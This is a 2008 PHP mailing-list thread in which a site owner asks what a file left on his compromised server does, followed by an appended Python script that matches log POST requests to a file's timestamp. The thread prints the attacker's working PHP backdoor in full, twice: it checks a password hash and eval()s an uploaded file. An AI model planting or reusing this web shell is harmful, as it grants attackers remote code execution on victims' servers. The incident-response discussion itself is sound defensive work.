On Fri, Apr 18, 2008 at 12:58 PM, Jim Lucas <lists@xxxxxxxxx> wrote:
> Eric Butera wrote:
> > On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:
> > > I'm continuing to work on this.
> > >
> > > One thing that seems obvious. The code executes the script code, using
> > > eval(), directly from the /tmp dir. So the usual security tests we do
> > > prior to using move_uploaded_file() are useless.
> > >
> > > Al wrote:
> > > > I'm still fighting my hack problem on one of my servers. Can anyone
> > > > help me figure out what's the purpose of this code. The hack places
> > > > this file in numerous dirs on the site, I assume using a php script
> > > > because the owner is "nobody".
> > > >
> > > > I can sort of figure what it is doing; but, I can't figure out what
> > > > the hacker is using it for.
> > > >
> > > > Incidentally, I've changed all passwords and restricted ftp to two
> > > > people.
> > > >
> > > > I see no sign that any code is written with by site owner, i.e., ftp.
> > > > And, I've looked carefully for suspect php files.
> > > >
> > > > <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
> > > >
> > > > <?php error_reporting(1);
> > > > global $HTTP_SERVER_VARS;
> > > > function say($t)
> > > > {
> > > >     echo "$t\n";
> > > > } ;
> > > > function testdata($t)
> > > > {
> > > >     say(md5("testdata_$t"));
> > > > } ;
> > > > echo "<pre>";
> > > > testdata('start');
> > > > if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
> > > > {
> > > >     if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
> > > >         $HTTP_POST_FILES["f"]["size"]))
> > > >     {
> > > >         eval($code);
> > > >     } else
> > > >     {
> > > >         testdata('f');
> > > >     } ;
> > > > } else
> > > > {
> > > >     testdata('pass');
> > > > } ;
> > > > testdata('end');
> > > > echo "</pre>";
> > > > ?>
> > >
> > > --
> > > PHP General Mailing List (http://www.php.net/)
> > > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> > Maybe you can look at the file time on the script in /tmp and look at
> > server logs around that same time to see if that is any hint of where
> > it might have come from.
>
> That won't work, the uploaded file is deleted after the
> script/process/request is completed. Standard PHP clean would get rid of
> it.
>
> --
> Jim Lucas
>
> "Some men are born to greatness, some achieve greatness,
> and some have greatness thrust upon them."
>
> Twelfth Night, Act II, Scene V
> by William Shakespeare

There is a file in /tmp that got created at some point by a request. That request happened at a given time. That file got created at a time. Even though the /tmp/dkhfsdfkh is gone the exploit is there. I guess I don't know what else to say.
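
The timestamp correlation discussed in this thread (matching the time a suspicious file appeared against web-server requests made around the same moment), as an added example that is not part of the original messages. It assumes the Apache "combined" log format; the log lines, IP addresses, paths and file timestamp are constructed sample data.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" log format (assumed; adjust for a custom LogFormat).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def requests_near(log_lines, file_time, window_s=5, methods=("POST",)):
    """Return log entries whose timestamp is within window_s of file_time.

    Only the given HTTP methods are kept: the backdoor quoted above reads
    its payload from a POSTed file upload, so POSTs are the default."""
    window = timedelta(seconds=window_s)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        ts = datetime.strptime(m["ts"], TS_FMT)
        if m["method"] in methods and abs(ts - file_time) <= window:
            hits.append({"time": ts, "ip": m["ip"], "path": m["path"],
                         "status": int(m["status"])})
    # Closest request first.
    return sorted(hits, key=lambda h: abs(h["time"] - file_time))

# Constructed sample data (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2008:03:14:02 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Apr/2008:03:14:07 -0400] "POST /gallery/upload.php HTTP/1.1" 200 231 "-" "-"',
    '192.0.2.10 - - [18/Apr/2008:03:14:09 -0400] "GET /style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Apr/2008:09:30:00 -0400] "POST /contact.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"',
]
# On a real host this would come from the file itself, e.g.
# datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)
FILE_TIME = datetime.strptime("18/Apr/2008:03:14:08 -0400", TS_FMT)

if __name__ == "__main__":
    for hit in requests_near(SAMPLE_LOG, FILE_TIME):
        print(hit["time"].isoformat(), hit["ip"], hit["path"], hit["status"])
```

A file's mtime can be reset by whoever wrote it, so compare it with st_ctime and widen the window if the two disagree.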